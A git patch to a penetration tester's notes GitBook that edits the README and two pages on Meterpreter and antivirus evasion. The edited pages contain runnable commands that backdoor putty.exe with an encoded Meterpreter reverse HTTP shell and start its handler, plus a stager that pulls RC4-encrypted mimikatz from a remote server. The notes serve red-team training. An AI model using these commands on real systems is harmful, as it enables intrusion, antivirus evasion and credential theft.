From 1a9bcdd020cf7d805a53378ac64d02204d551918 Mon Sep 17 00:00:00 2001 From: Sam Freeside Date: Mon, 6 Mar 2023 22:13:49 +0300 Subject: [PATCH] [AHK] Automatic update :alien: --- README.md | 10 ++++++++-- pentest/c2/meterpreter.md | 5 +++-- pentest/infrastructure/ad/av-edr-evasion/README.md | 4 ++-- 3 files changed, 13 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 9a810eb..b6cbcb5 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,9 @@ Hey there! -I'm [snovvcrash](https://snovvcrash.rocks/about) and that's a gitbook for keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... **responsibly**, of course! +I'm [snovvcrash](https://snovvcrash.rocks/about) and I do ethical penetration testing, red teaming, offensive tooling developement and cybersecurity researching. + +This is a GitBook of mine whose purpose is keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... **responsibly**, of course! While taking these notes, one main rule is that all the given techniques are actually tested either during a real engagement or in a training lab. @@ -12,8 +14,12 @@ While taking these notes, one main rule is that all the given techniques are act **DISCLAIMER.** All information contained in this blog is provided for educational and research purposes only. The author is not responsible for any illegal use of any information published on the pages of this blog. {% endhint %} +{% hint style="success" %} +**SUPPORT.** Private pet projects of mine in offensive tooling are available [for my sponsors](https://boosty.to/snovvcrash). +{% endhint %} + {% hint style="info" %} -Previous version of PPN is ➡️ [here](https://snovvcrash.rocks/PPN/) (deprecated). +**DEPRECATED.** The previous version of PPN is right [here](https://snovvcrash.rocks/PPN/). {% endhint %} ## About diff --git a/pentest/c2/meterpreter.md b/pentest/c2/meterpreter.md index 35d1760..fd06362 100644 --- a/pentest/c2/meterpreter.md +++ b/pentest/c2/meterpreter.md @@ -144,8 +144,9 @@ Backdoored legit executable with delayed Stdapi loading: ``` $ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8088 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe -$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8088; set AutoLoadStdapi false; set EXITFUNC thread; run' +$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe +$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run' +meterpreter > load stdapi ``` diff --git a/pentest/infrastructure/ad/av-edr-evasion/README.md b/pentest/infrastructure/ad/av-edr-evasion/README.md index 751d83b..8ae77fa 100644 --- a/pentest/infrastructure/ad/av-edr-evasion/README.md +++ b/pentest/infrastructure/ad/av-edr-evasion/README.md @@ -335,9 +335,9 @@ mv "C:\Windows\Temp\$target\$obf\bin\Release\$obf.exe" "\\vmware-host\Shared Fol - [https://github.com/hasherezade/libpeconv](https://github.com/hasherezade/libpeconv) ``` -$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv +$ git clone --recurse-submodules https://github.com/tothi/stager_libpeconv && cd stager_libpeconv $ openssl enc -rc4 -in mimikatz.exe -K `echo -n '1234567890123456' | xxd -p` -nosalt -out mimikatz.rc4 $ make stager IMPLANT_IP=10.10.13.37 IMPLANT_PORT=1337 RC4_KEY=1234567890123456 $ ./socket_binary_server.py mimikatz.rc4 10.10.13.37 1337 -Cmd > stager.exe +Cmd > dist\stager.exe ```